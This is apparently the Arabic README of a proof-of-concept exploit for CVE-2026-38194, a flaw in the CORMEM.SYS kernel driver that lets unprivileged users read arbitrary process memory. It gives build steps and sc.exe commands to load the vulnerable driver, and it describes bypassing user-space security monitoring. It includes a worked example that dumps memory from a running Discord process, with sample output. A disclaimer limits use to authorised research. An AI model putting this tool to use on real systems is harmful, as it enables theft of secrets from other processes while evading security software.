
تُظهر هذه الأداة CVE-2026-38194، وهي ثغرة أمنية في Teledyne Digital Imaging Sapera Memory Manager (الإصدار 9.0.0.0 وما دونه). يقوم برنامج تشغيل النواة CORMEM.SYS بتعريض IOCTLs دون أي فحوصات للتحكم في الوصول، مما يسمح لمستخدم عادي غير مميز بقراءة وكتابة ذاكرة عملية عشوائية مباشرة من خلال النواة — متجاوزًا مراقبة Win32 API
إخلاء مسؤولية:
هذا المشروع لأغراض البحث الأمني والتعليمي فقط. استخدمه فقط على أنظمة تمتلكها أو لديك إذن صريح لاختبارها. قد يكون الاستخدام غير المصرح به غير قانوني في بلدك.
توضح هذه الأداة الثغرة CVE-2026-38194، وهي ثغرة في Teledyne Digital Imaging Sapera Memory Manager (الإصدار 9.0.0.0 وما دونه).
يعرض برنامج تشغيل النواة CORMEM.SYS استدعاءات الإدخال/الإخراج (IOCTLs) دون أي فحوصات للتحكم في الوصول،
مما يسمح لمستخدم عادي غير مميز بقراءة وكتابة ذاكرة أي عملية بشكل تعسفي
مباشرة عبر النواة — متجاوزًا بذلك مراقبة Win32 API بالكامل.

يتم الوصول إلى الذاكرة عبر ترجمة العنوان الفعلي (اجتياز جدول الصفحات) بدلاً من ReadProcessMemory، مما يجعلها شفافة بالنسبة لمعظم برامج الأمن في مساحة المستخدم.
cmake -B build -A x64
cmake --build build --config Release
إذا لم يكن CORMEM.SYS محملًا بالفعل، فقم بتحميله يدويًا كمسؤول:
sc.exe create CORMEM binPath= "C:\path\to\CORMEM.SYS" type= kernel start= demand
sc.exe start CORMEM
قم بإلغاء التحميل عند الانتهاء:
sc.exe stop CORMEM
sc.exe delete CORMEM
cordrv_exploit.exe <pid> <address> [size]
pid معرف العملية (رقم عشري)
address عنوان افتراضي للقراءة (سداسي عشري)
size عدد البايتات لتفريغها، القيمة الافتراضية 256، الحد الأقصى 1048576
# احصل على عملية Discord الرئيسية
$proc = Get-Process -Name "Discord" | Sort-Object WorkingSet -Descending | Select-Object -First 1
$discordPid = $proc.Id
$base = $proc.Modules[0].BaseAddress
Write-Host "PID : $discordPid"
Write-Host "Base : 0x$($base.ToString('X'))"
.\build\Release\cordrv_exploit.exe $discordPid "0x$($base.ToString('X'))" 256
الناتج المتوقع:
[*] Target PID : 16364
[*] Target address : 0x7FF6FC180000
[*] Dump size : 256 bytes
[*] Initializing CorDrv...
[+] Driver initialized.
[*] Finding system DTB...
[+] System DTB: 0x1AE000
[*] Searching EPROCESS list for PID 16364...
[+] Process DTB: 0x2CD30F000
[+] VA 0x7FF6FC180000 -> PA 0x1A98C2000
Memory dump (0x7FF6FC180000, 256 bytes):
7FF6FC180000: 4D 5A 78 00 01 00 00 00 04 00 00 00 00 00 00 00
7FF6FC180010: 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
...
[+] Done.
تؤكد 4D 5A عند الإزاحة 0 أنه تمت قراءة رأس MZ بنجاح من ذاكرة الوصول العشوائي الفعلية.